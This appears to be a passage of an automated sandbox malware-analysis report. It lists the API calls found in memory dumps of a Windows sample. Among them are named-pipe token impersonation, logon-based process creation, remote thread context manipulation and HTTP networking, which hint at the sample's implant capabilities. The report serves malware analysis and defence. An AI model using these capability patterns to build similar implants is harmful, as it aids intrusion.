                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                                                                  • String ID:
                                                                  • API String ID: 2611593033-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 2289611984-0
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 009B1A19
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • __doserrno.LIBCMT ref: 009B1A11
                                                                    • Part of subcall function 009AD9A0: _getptd_noexit.LIBCMT ref: 009AD9A4
                                                                  • __lock_fhandle.LIBCMT ref: 009B1A5D
                                                                  • _close_nolock.LIBCMT ref: 009B1A70
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                                                                  • String ID:
                                                                  • API String ID: 4060740672-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: NamedPipe$Thread$ClientCloseConnectCurrentDisconnectErrorFileHandleImpersonateLastOpenReadToken
                                                                  • String ID:
                                                                  • API String ID: 1569842636-0
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 03543AF0
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                  • malloc.LIBCMT ref: 03543AFA
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A703
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A708
                                                                  • malloc.LIBCMT ref: 03543B05
                                                                  • free.LIBCMT ref: 03543CC5
                                                                  • free.LIBCMT ref: 03543CCD
                                                                  • free.LIBCMT ref: 03543CD5
                                                                    • Part of subcall function 03544937: malloc.LIBCMT ref: 03544981
                                                                    • Part of subcall function 03544937: malloc.LIBCMT ref: 0354498C
                                                                    • Part of subcall function 03544937: free.LIBCMT ref: 03544A73
                                                                    • Part of subcall function 03544937: free.LIBCMT ref: 03544A7B
                                                                  • free.LIBCMT ref: 03543CE1
                                                                  • free.LIBCMT ref: 03543CEE
                                                                  • free.LIBCMT ref: 03543CFB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$malloc$_errno$_callnewh
                                                                  • String ID:
                                                                  • API String ID: 4160633307-0
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009946A9
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • malloc.LIBCMT ref: 009946B3
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB2BC
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2C1
                                                                  • malloc.LIBCMT ref: 009946BE
                                                                  • free.LIBCMT ref: 0099487E
                                                                  • free.LIBCMT ref: 00994886
                                                                  • free.LIBCMT ref: 0099488E
                                                                    • Part of subcall function 009954F0: malloc.LIBCMT ref: 0099553A
                                                                    • Part of subcall function 009954F0: malloc.LIBCMT ref: 00995545
                                                                    • Part of subcall function 009954F0: free.LIBCMT ref: 0099562C
                                                                    • Part of subcall function 009954F0: free.LIBCMT ref: 00995634
                                                                  • free.LIBCMT ref: 0099489A
                                                                  • free.LIBCMT ref: 009948A7
                                                                  • free.LIBCMT ref: 009948B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free$malloc$_errno$_callnewh$AllocHeap
                                                                  • String ID:
                                                                  • API String ID: 3534990644-0
                                                                  APIs
                                                                    • Part of subcall function 009A4720: malloc.LIBCMT ref: 009A473C
                                                                  • GetStartupInfoA.KERNEL32 ref: 009A07E4
                                                                    • Part of subcall function 0099F9F4: MultiByteToWideChar.KERNEL32 ref: 0099FA21
                                                                    • Part of subcall function 0099F9F4: MultiByteToWideChar.KERNEL32 ref: 0099FA49
                                                                  • GetCurrentDirectoryW.KERNEL32 ref: 009A0871
                                                                  • GetCurrentDirectoryW.KERNEL32 ref: 009A0880
                                                                  • CreateProcessWithLogonW.ADVAPI32 ref: 009A08DB
                                                                  • GetLastError.KERNEL32 ref: 009A08E5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                                                                  • String ID: %s as %s\%s: %d
                                                                  • API String ID: 3435635427-816037529
                                                                  APIs
                                                                  • _errno.LIBCMT ref: 0355B21D
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0355B229
                                                                  • __crtIsPackagedApp.LIBCMT ref: 0355B23A
                                                                  • _dosmaperr.LIBCMT ref: 0355B284
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 2917016420-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
                                                                  • String ID:
                                                                  • API String ID: 4120058822-0
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009BBB04
                                                                    • Part of subcall function 009AE220: _getptd.LIBCMT ref: 009AE236
                                                                    • Part of subcall function 009AE220: __updatetlocinfo.LIBCMT ref: 009AE26B
                                                                    • Part of subcall function 009AE220: __updatetmbcinfo.LIBCMT ref: 009AE292
                                                                  • _errno.LIBCMT ref: 009BBB1F
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009BBB2A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
                                                                  • String ID:
                                                                  • API String ID: 3191669884-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Thread$Context$AddressCreateHandleModuleProcRemoteResume
                                                                  • String ID:
                                                                  • API String ID: 2251766279-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandle$free$DisconnectNamedPipe
                                                                  • String ID:
                                                                  • API String ID: 3879126888-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTickioctlsocket
                                                                  • String ID:
                                                                  • API String ID: 3686034022-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: NamedPipe$ErrorHandleLast$CloseCreateDisconnectFileStateWait
                                                                  • String ID:
                                                                  • API String ID: 321441075-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                                  • String ID:
                                                                  • API String ID: 2328795619-0
                                                                  APIs
                                                                  • _mtinitlocknum.LIBCMT ref: 009B6121
                                                                    • Part of subcall function 009AFBF8: _FF_MSGBANNER.LIBCMT ref: 009AFC15
                                                                    • Part of subcall function 009AFBF8: _NMSG_WRITE.LIBCMT ref: 009AFC1F
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 009B61A4
                                                                  • EnterCriticalSection.KERNEL32 ref: 009B61C0
                                                                  • LeaveCriticalSection.KERNEL32 ref: 009B61D0
                                                                  • _calloc_crt.LIBCMT ref: 009B6246
                                                                  • __lock_fhandle.LIBCMT ref: 009B62AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 445582508-0
                                                                  APIs
                                                                    • Part of subcall function 009A4720: malloc.LIBCMT ref: 009A473C
                                                                    • Part of subcall function 009AC5C0: _errno.LIBCMT ref: 009AC517
                                                                    • Part of subcall function 009AC5C0: _invalid_parameter_noinfo.LIBCMT ref: 009AC522
                                                                  • fseek.LIBCMT ref: 009A09D4
                                                                    • Part of subcall function 009ACE44: _errno.LIBCMT ref: 009ACE6C
                                                                    • Part of subcall function 009ACE44: _invalid_parameter_noinfo.LIBCMT ref: 009ACE77
                                                                  • _ftelli64.LIBCMT ref: 009A09DC
                                                                    • Part of subcall function 009ACEB8: _errno.LIBCMT ref: 009ACED6
                                                                    • Part of subcall function 009ACEB8: _invalid_parameter_noinfo.LIBCMT ref: 009ACEE1
                                                                  • fseek.LIBCMT ref: 009A09EC
                                                                    • Part of subcall function 009ACE44: _fseek_nolock.LIBCMT ref: 009ACE95
                                                                  • GetFullPathNameA.KERNEL32 ref: 009A0A0F
                                                                  • malloc.LIBCMT ref: 009A0A2C
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                    • Part of subcall function 0099CFCC: malloc.LIBCMT ref: 0099CFDF
                                                                    • Part of subcall function 0099CFFC: htonl.WS2_32 ref: 0099D007
                                                                  • fclose.LIBCMT ref: 009A0AE9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Similarity
                                                                  • API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
                                                                  • String ID:
                                                                  • API String ID: 3587854850-0
                                                                  APIs
                                                                  • GetACP.KERNEL32 ref: 009A43AC
                                                                  • GetOEMCP.KERNEL32 ref: 009A43B6
                                                                  • GetCurrentProcessId.KERNEL32 ref: 009A43DC
                                                                  • GetTickCount.KERNEL32 ref: 009A43E4
                                                                    • Part of subcall function 009AC3EC: _getptd.LIBCMT ref: 009AC3F4
                                                                  • GetCurrentProcess.KERNEL32 ref: 009A4420
                                                                    • Part of subcall function 0099FF18: GetModuleHandleA.KERNEL32 ref: 0099FF2D
                                                                    • Part of subcall function 0099FF18: GetProcAddress.KERNEL32 ref: 0099FF3D
                                                                  • GetCurrentProcessId.KERNEL32 ref: 009A4492
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Similarity
                                                                  • API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
                                                                  • String ID:
                                                                  • API String ID: 3426420785-0
                                                                  APIs
                                                                    • Part of subcall function 009AA948: RevertToSelf.ADVAPI32 ref: 009AA956
                                                                  • InternetOpenA.WININET ref: 0099E7DD
                                                                  • InternetSetOptionA.WININET ref: 0099E7FD
                                                                  • InternetSetOptionA.WININET ref: 0099E815
                                                                  • InternetConnectA.WININET ref: 0099E84B
                                                                  • InternetSetOptionA.WININET ref: 0099E888
                                                                  • InternetSetOptionA.WININET ref: 0099E8B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Internet$Option$ConnectOpenRevertSelf
                                                                  • String ID:
                                                                  • API String ID: 1513466045-0
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009A55C6
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • htonl.WS2_32 ref: 009A55F9
                                                                  • recvfrom.WS2_32 ref: 009A563D
                                                                  • WSAGetLastError.WS2_32 ref: 009A564A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Similarity
                                                                  • API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
                                                                  • String ID:
                                                                  • API String ID: 2310505145-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                                  • String ID:
                                                                  • API String ID: 1547050394-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Thread$Context$Resume
                                                                  • String ID:
                                                                  • API String ID: 1758964557-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Similarity
                                                                  • API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
                                                                  • String ID:
                                                                  • API String ID: 1547050394-0
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 0099F831
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • free.LIBCMT ref: 0099F86C
                                                                  • fwrite.LIBCMT ref: 0099F8AD
                                                                  • fclose.LIBCMT ref: 0099F8B5
                                                                  • free.LIBCMT ref: 0099F8C2
                                                                    • Part of subcall function 009AB1E8: HeapFree.KERNEL32 ref: 009AB1FE
                                                                    • Part of subcall function 009AB1E8: _errno.LIBCMT ref: 009AB208
                                                                    • Part of subcall function 009AB1E8: GetLastError.KERNEL32 ref: 009AB210
                                                                  • GetLastError.KERNEL32 ref: 0099F8C7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Similarity
                                                                  • API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
                                                                  • String ID:
                                                                  • API String ID: 1616846154-0
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009AB107
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • malloc.LIBCMT ref: 009AB115
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB2BC
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2C1
                                                                  • malloc.LIBCMT ref: 009AB137
                                                                  • _snprintf.LIBCMT ref: 009AB152
                                                                    • Part of subcall function 009AB5DC: _errno.LIBCMT ref: 009AB613
                                                                    • Part of subcall function 009AB5DC: _invalid_parameter_noinfo.LIBCMT ref: 009AB61E
                                                                  • malloc.LIBCMT ref: 009AB16D
                                                                  Strings
                                                                  • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 009AB13C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  Similarity
                                                                  • API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
                                                                  • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                                                                  • API String ID: 3518644649-2739389480
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 03543604
                                                                    • Part of subcall function 0355A66F: _FF_MSGBANNER.LIBCMT ref: 0355A69F
                                                                    • Part of subcall function 0355A66F: _NMSG_WRITE.LIBCMT ref: 0355A6A9
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A6DD
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6E8
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A6F3
                                                                  • malloc.LIBCMT ref: 0354360F
                                                                    • Part of subcall function 0355A66F: _callnewh.LIBCMT ref: 0355A703
                                                                    • Part of subcall function 0355A66F: _errno.LIBCMT ref: 0355A708
                                                                  • free.LIBCMT ref: 035436F6
                                                                  • free.LIBCMT ref: 035436FE
                                                                  • free.LIBCMT ref: 03543706
                                                                  • free.LIBCMT ref: 03543712
